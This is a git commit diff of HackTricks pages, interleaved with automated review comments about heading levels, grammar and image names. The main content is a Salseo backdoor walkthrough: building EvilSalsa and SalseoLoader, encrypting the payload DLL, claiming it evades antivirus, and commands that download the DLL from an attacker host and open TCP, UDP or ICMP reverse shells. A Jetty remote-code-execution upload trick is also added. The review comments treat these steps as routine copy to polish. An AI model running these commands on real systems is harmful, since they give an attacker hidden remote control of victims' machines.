GitBook: [#3350] No subject
This commit is contained in:
parent
b5f741ec8d
commit
aaef4ab1db
BIN
.gitbook/assets/image (1) (2).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 5.6 KiB |
Binary file not shown.
Before Width: | Height: | Size: 5.6 KiB After Width: | Height: | Size: 755 KiB |
BIN
.gitbook/assets/image (2) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 94 KiB |
Binary file not shown.
Before Width: | Height: | Size: 94 KiB After Width: | Height: | Size: 7.8 KiB |
@ -1,4 +1,4 @@
|
||||
|
||||
# Salseo
|
||||
|
||||
<details>
|
||||
|
||||
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Compiling the binaries
|
||||
## Compiling the binaries
|
||||
|
||||
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
|
||||
|
||||
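Review bot: demoting `# Compiling the binaries` to `## Compiling the binaries` is the right fix, since GitBook already takes `# Salseo` as the page title and the old layout produced several H1 headings on one page. While this hunk is open, the context line `Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**` should name the repository it refers to (it tells the reader what to compile but not where the source lives) and `the github` should read `GitHub`.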
@ -25,26 +24,26 @@ Compile those projects for the architecture of the windows box where your are go
|
||||
|
||||
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
|
||||
|
||||
(**If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
|
||||
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
|
||||
|
||||
![](../.gitbook/assets/image.png)
|
||||
|
||||
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
|
||||
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
![](<../.gitbook/assets/image (1) (2).png>)
|
||||
|
||||
# Prepare the Backdoor
|
||||
## Prepare the Backdoor
|
||||
|
||||
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
|
||||
|
||||
## **Python**
|
||||
### **Python**
|
||||
|
||||
```
|
||||
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
|
||||
```
|
||||
|
||||
## Windows
|
||||
### Windows
|
||||
|
||||
```
|
||||
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
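Review bot: the change from `(**If you can't find this options ...` to `(\*\*If you can't find this options ...` swaps one rendering bug for another: the original stray `**` opened an unbalanced bold span, and the escaped form now prints two literal asterisks in front of `If`. Drop the stray `**` entirely so the line reads `(If you can't find these options, press ...`, which also fixes `this options`. Two further points on the visible lines: the usage example `python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt` names `EvilSalsax.dll`, which disagrees with the prose (`EvilSalsa.dll`) and the `<FILE>` placeholder above it and looks like a typo; and the swap from `image (1).png` to `image (1) (2).png` matches the 5.6 KiB asset added at the top of this commit, but the numeric asset names are fragile (the same commit also replaces `image (1).png` with a 755 KiB file that the second file in this commit reuses), so a descriptive name such as `salseo-build-output.png` would make the reference self-explanatory.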
@ -55,9 +54,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco
|
||||
|
||||
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
|
||||
|
||||
# **Execute the backdoor**
|
||||
## **Execute the backdoor**
|
||||
|
||||
## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
|
||||
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
|
||||
|
||||
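Review bot: the context line `**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**` mixes number (`binary` ... `They`) and states an absolute, undated claim about AV detection that a reader cannot verify; since the hunk touches the headings right around it, reword it to something like `It was not flagged by the AV engines tested at the time of writing`, or drop the claim. The demotions (`# Execute the backdoor` to `##`, `## Getting a TCP reverse shell ...` to `###`) are consistent with the rest of the commit.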
@ -65,7 +64,7 @@ Remember to start a nc as the reverse shell listener and a HTTP server to serve
|
||||
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
|
||||
```
|
||||
|
||||
## **Getting a UDP reverse shell (downloading encoded dll through SMB)**
|
||||
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
|
||||
|
||||
@ -73,11 +72,11 @@ Remember to start a nc as the reverse shell listener, and a SMB server to serve
|
||||
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
|
||||
```
|
||||
|
||||
## **Getting a ICMP reverse shell (encoded dll already inside the victim)**
|
||||
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
|
||||
|
||||
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
||||
|
||||
### **Disable ICMP Replies:**
|
||||
#### **Disable ICMP Replies:**
|
||||
|
||||
```
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
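Review bot: `### **Getting a ICMP reverse shell (encoded dll already inside the victim)**` keeps the grammar slip from the old heading; while demoting it, change `a ICMP` to `an ICMP`. `#### **Disable ICMP Replies:**` now sits one level below the H3 it belongs to, which matches the hierarchy this commit establishes, but the trailing colon is inconsistent with the other headings in the file and should be removed.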
@ -86,45 +85,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=0
|
||||
```
|
||||
|
||||
### Execute the client:
|
||||
#### Execute the client:
|
||||
|
||||
```
|
||||
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
|
||||
```
|
||||
|
||||
### Inside the victim, lets execute the salseo thing:
|
||||
#### Inside the victim, lets execute the salseo thing:
|
||||
|
||||
```
|
||||
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
|
||||
```
|
||||
|
||||
# Compiling SalseoLoader as DLL exporting main function
|
||||
## Compiling SalseoLoader as DLL exporting main function
|
||||
|
||||
Open the SalseoLoader project using Visual Studio.
|
||||
|
||||
## Add before the main function: \[DllExport]
|
||||
### Add before the main function: \[DllExport]
|
||||
|
||||
![](<../.gitbook/assets/image (2).png>)
|
||||
![](<../.gitbook/assets/image (2) (1).png>)
|
||||
|
||||
## Install DllExport for this project
|
||||
### Install DllExport for this project
|
||||
|
||||
### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||
|
||||
![](<../.gitbook/assets/image (3).png>)
|
||||
|
||||
### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||
|
||||
![](<../.gitbook/assets/image (4).png>)
|
||||
|
||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||
|
||||
## **U**ninstall DllExport
|
||||
### **U**ninstall DllExport
|
||||
|
||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||
|
||||
![](<../.gitbook/assets/image (5).png>)
|
||||
|
||||
## **Exit Visual Studio and execute DllExport\_configure**
|
||||
### **Exit Visual Studio and execute DllExport\_configure**
|
||||
|
||||
Just **exit** Visual Studio
|
||||
|
||||
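Review bot: the context line `python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"` has a typo in the placeholder (`Victm-IP` should be `Victim-IP`) that survives this edit. Among the demoted headings, `#### Inside the victim, lets execute the salseo thing:` should read `let's`, and `### **U**ninstall DllExport` bolds only the single letter `U`, which is a stray emphasis marker and should be plain `### Uninstall DllExport`. Escaping `\[DllExport]` is correct, since GitBook would otherwise try to parse `[DllExport]` as a link reference. The swap from `image (2).png` to `image (2) (1).png` is consistent with the 94 KiB asset added at the top of the commit; the same fragility note as for `image (1) (2).png` applies.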
@ -134,13 +133,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),
|
||||
|
||||
![](<../.gitbook/assets/image (7).png>)
|
||||
|
||||
## **Open the project again with visual Studio**
|
||||
### **Open the project again with visual Studio**
|
||||
|
||||
**\[DllExport]** should not be longer marked as error
|
||||
|
||||
![](<../.gitbook/assets/image (8).png>)
|
||||
|
||||
## Build the solution
|
||||
### Build the solution
|
||||
|
||||
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
|
||||
|
||||
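Review bot: `### **Open the project again with visual Studio**` should capitalise `Visual Studio` as the rest of the file does, and the context line `**\[DllExport]** should not be longer marked as error` reads better as `should no longer be marked as an error`. The heading demotions in this hunk are consistent with the others.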
@ -152,7 +151,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P
|
||||
|
||||
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
|
||||
|
||||
## Test the generated Dll
|
||||
### Test the generated Dll
|
||||
|
||||
Copy and paste the Dll where you want to test it.
|
||||
|
||||
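Review bot: `### Test the generated Dll` and the context line `Copy and paste the Dll where you want to test it.` spell the acronym `Dll`, while the section title `Compiling SalseoLoader as DLL exporting main function` uses `DLL`; settle on `DLL` throughout.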
@ -164,11 +163,11 @@ rundll32.exe SalseoLoader.dll,main
|
||||
|
||||
If no error appears, probably you have a functional DLL!!
|
||||
|
||||
# Get a shell using the DLL
|
||||
## Get a shell using the DLL
|
||||
|
||||
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
|
||||
|
||||
## Powershell
|
||||
### Powershell
|
||||
|
||||
```
|
||||
$env:pass="password"
|
||||
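Review bot: `### Powershell` should be `### PowerShell` (the product name); the demotion itself is consistent with the rest of the commit.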
@ -179,7 +178,7 @@ $env:shell="reversetcp"
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
## CMD
|
||||
### CMD
|
||||
|
||||
```
|
||||
set pass=password
|
||||
@ -190,7 +189,6 @@ set shell=reversetcp
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
@ -206,5 +204,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
![](<../../.gitbook/assets/image (2).png>)
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
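Review bot: replacing the raw `<img src="../../.gitbook/assets/image (620) ... .png" alt="" data-size="original">` tag with `![](<../../.gitbook/assets/image (2).png>)` changes how GitBook sizes the banner (the raw tag pinned the original dimensions) and points at `image (2).png`, a name this same commit vacates on the Salseo page in favour of `image (2) (1).png`; the binary headers at the top show a 94 KiB file replaced by a 7.8 KiB one next to the new `image (2) (1).png`, which is presumably this `image (2).png`, so confirm the 7.8 KiB file really is the Intigriti banner and not a leftover Salseo screenshot, since the numeric names give no hint. The markdown form also drops the (empty) alt attribute; give the image alt text, e.g. `![Intigriti banner](...)`.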
@ -106,6 +106,12 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
|
||||
|
||||
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
|
||||
|
||||
## **Jetty RCE**
|
||||
|
||||
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
||||
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
## **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
|
||||
|
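Review bot: the `## **Jetty RCE**` section this hunk introduces rests a strong claim (`new *.xml and *.war are automatically processed`) on a single tweet screenshot; cite Jetty's own deployment documentation for the `webapps` hot-deploy behaviour so the statement outlives the tweet, and, since this is a file-upload page, add the defensive counterpart (keep `$JETTY_BASE/webapps/` unwritable to the application and turn off hot deployment where it is not needed). Grammar on the visible lines: `a XML file` should be `an XML file`, and the context line `someone could have allow **this extension to be executed**` should read `could have allowed`. The `## **wget File Upload/SSRF Trick**` section ends on this page with `**this check can be bypassed.**\` (a trailing hard-break backslash) and the bypass and the rest of the section are not in the visible hunk, so as shown it promises something it does not deliver; make sure the full text lands in the same commit. Finally, the bold markers inside both new H2 headings (`## **Jetty RCE**`) are redundant, as GitBook already renders headings in bold.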